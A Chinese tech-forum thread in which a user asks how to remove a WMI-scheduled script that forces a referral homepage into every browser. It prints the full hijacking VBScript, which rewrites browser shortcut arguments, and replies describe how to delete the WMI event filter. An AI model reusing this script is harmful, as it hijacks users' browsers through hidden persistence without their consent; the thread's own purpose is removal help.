无忧启动论坛

标题: 定时自动运行脚本捆绑主页如何清除 [打印本页]

作者: gzwcx 时间: 2016-11-11 19:36
标题: 定时自动运行脚本捆绑主页如何清除
本帖最后由 gzwcx 于 2016-11-12 13:27 编辑

吃了苍蝇了！……http://hao524.com/?r=glaryutilitiesxx&m=xx3,打开多个浏览器：Chrome, Firefox, Opera,theworld, iexplorer，均相同症状，检查浏览器首页设置——均正常！
用注册表编辑器修改,组策略清除也不能删除,定时2小时篡改一次.强制捆绑了主页，怎么都改不回来，杯具了……
通过WMI发起的定时自动运行脚本，用WMITool 工具也不能清除。
ScriptText 具体代码如下：
On Error Resume Next:Const link = "http://hao524.com/?r=glaryutilitiesxx&m=xx3":Const link360 = "http://hao524.com/?r=glaryutilitiesxx&m=xx3&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
用什么方法可以清除ScriptText？否则只有重装系统了.

作者: tools241 时间: 2016-11-11 20:44
简/繁 PE 通用工具包PE_Tools (Unlocker,64bit-Checker,7-Zip,PDFX,WordReader,WimTool,Recuva[救回误删档],
BOOTICE,手写+XP14种输入法+yong小小输入法10种,VeraCrypt加密,Defraggler磁碟重组,WinContig碎片文件整理)
可再添加Firefox,Chrome,影片剪辑 ==>
http://bbs.wuyou.net/forum.php?mod=viewthread&tid=375264
http://nonameteam.cc/thread-2887-1-1.html

作者: 易广白 时间: 2016-11-11 20:58
这网址发岀来，让人一顺手就点击了，不太好

作者: ggmm888 时间: 2016-11-11 21:18
这个是在桌面上的快捷方式里面添加的链接，把这个网址去掉即可。

作者: 2011momoto 时间: 2016-11-11 21:21
试试看，行不行。

WimTool.rar (597.38 KB, 下载次数: 13)

作者: gzwcx 时间: 2016-11-11 21:39

2011momoto 发表于 2016-11-11 21:21
试试看，行不行。

不是这个工具，微软WmiTools：WMI Administrative Tools

作者: nttwqz 时间: 2016-11-11 23:29
楼主，我帮你搜索了一下，第一页就有

http://pan.baidu.com/s/1pC4tr

作者: nttwqz 时间: 2016-11-11 23:34

每次重启都会生成

这说明有开机启动项未清除干净

作者: zengqcyxx 时间: 2016-11-12 00:58

nttwqz 发表于 2016-11-11 23:34
这说明有开机启动项未清除干净

这与开机启动项无关，是人家对内核作了手脚，自动定时创建修改浏览器网址脚本，只能通过WMItools将该脚本删除。

作者: tools241 时间: 2016-11-12 07:47
本帖最后由 tools241 于 2016-11-12 07:53 编辑

** Firefox 50 免安装异空版 + Flash Player +26元件 (简/繁/英 , PE/Windows 一版通用) ==>
http://bbs.wuyou.net/forum.php?mod=viewthread&tid=375104
https://www.firefox.net.CN/read-52082
http://blog.xuite.net/tools241/blog/108046689
https://forum.mozTW.org/viewforum.php?f=43
http://nonameteam.cc/thread-1308-1-1.html

此 Firefox 免安装版 对多数绑首页/分页的网址( ha?5??, ha?1??, ha?, babylon , qvo6, nationzoom, ask, ... )已免疫.

如何在PE添加Firefox/Chrome请参考此版附档: r说明在PE添加Firefox,GoogleChrome.txt

作者: nttwqz 时间: 2016-11-12 22:42

zengqcyxx 发表于 2016-11-12 00:58
这与开机启动项无关，是人家对内核作了手脚，自动定时创建修改浏览器网址脚本，只能通过WMItools将该脚本 ...

能具体说说吗？

是修改了系统关键文件？dll调用？开机脚本？关机脚本？计划任务？系统服务？驱动？注册表项？

作者: zengqcyxx 时间: 2016-11-13 15:35
以管理员运行该软件，ScriptText是直接删除不了的。方法：点左方eventfiter出现的下方项目，该项目就是脚本，直接在该项目右键删除就可以了。（也就是直接在左边操作，不用理会右边）

欢迎光临无忧启动论坛 (http://wuyou.net/)